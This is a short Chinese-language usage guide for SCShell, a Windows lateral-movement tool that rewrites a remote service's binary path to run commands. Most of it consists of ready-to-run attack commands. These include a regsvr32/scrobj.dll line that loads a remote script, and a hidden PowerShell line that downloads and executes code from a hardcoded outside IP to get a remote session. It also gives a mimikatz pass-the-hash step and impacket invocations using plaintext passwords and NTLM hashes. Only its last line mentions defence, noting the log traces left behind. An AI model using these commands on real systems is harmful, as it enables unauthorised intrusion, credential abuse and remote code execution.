1、簡介
SCShell是無檔案橫向移動工具,它依賴ChangeServiceConfigA來執行命令。該工具的優點在於它不會針對SMB執行身份驗證。一切都通過DCERPC執行。無需建立服務,而只需通過ChangeServiceConfigAAPI 遠端開啟服務並修改二進位制路徑名即可(所以要事先知道目標上的服務名稱)。支援py和exe兩種檔案型別。
2、使用
Windows 使用
SCShell.exe target service payload domain username password
SCShell.exe 192.168.197.131 XblAuthManager "C:\windows\system32\cmd.exe /c C:\windows\system32\regsvr32.exe /s /n /u /i://your.website/payload.sct scrobj.dll" . administrastor Password # XblAuthManager 是 Xbox Accessory Management Service的服務名
測試寫入檔案
scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c echo ' hello' > c:\windows\temp\hello.txt" . administrator admin@123
CSshell橫向利用powershell上線
scshell.exe 192.168.152.148 defragsvc "C:\windows\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://182.1.1.156:8000/a')" . administrator admin@123
可以使用該C程式傳遞雜湊值。
有時情況下,將使用當前程式令牌。您可以使用標準傳遞雜湊方法設定當前流程令牌。
在本地系統上
sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:cmd.exe
然後在新建立的cmd.exe中執行SCShell.exe進行橫向。
上面我們使用的是XblAuthManager,其實我們還可以使用defragsvc,msbuild等等
2. Linux 安裝使用
pip install impacket
git clone https://github.com/Mr-Un1k0d3r/SCShell
cd https://github.com/Mr-Un1k0d3r/SCShell
python scshell.py ./administrator:cxzcxz@192.168.52.133 # 執行cmd模式,沒有命令回顯
python scshell.py DOMAIN/USER@target -hashes 00000000000000000000000000000000:ad9827fcd039eadde017568170abdecce # hash驗證
3、日誌痕跡
使用使用者憑證連線會在目標日誌系統留下使用者名稱、來訪機器IP和服務超時等資訊